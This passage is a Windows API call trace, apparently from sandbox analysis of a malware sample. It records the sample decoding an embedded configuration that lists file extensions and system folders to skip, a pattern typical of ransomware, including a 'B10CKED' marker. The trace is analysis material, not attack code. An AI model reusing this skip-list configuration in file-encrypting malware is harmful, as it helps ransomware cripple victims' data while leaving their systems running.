lpMultiByteStr=0x635008, cbMultiByte=38, lpWideCharStr=0x62deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.130] FreeResource (hResData=0x50d64c) returned 0 [0117.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x63500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.130] GetCurrentThreadId () returned 0xe60 [0117.130] GetCurrentThreadId () returned 0xe60 [0117.130] GetCurrentThreadId () returned 0xe60 [0117.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5c0128, cbMultiByte=615, 
lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0117.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5c0128, cbMultiByte=615, lpWideCharStr=0x5cc65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", 
cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", 
cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", 
cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", 
cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", 
cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 
[0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 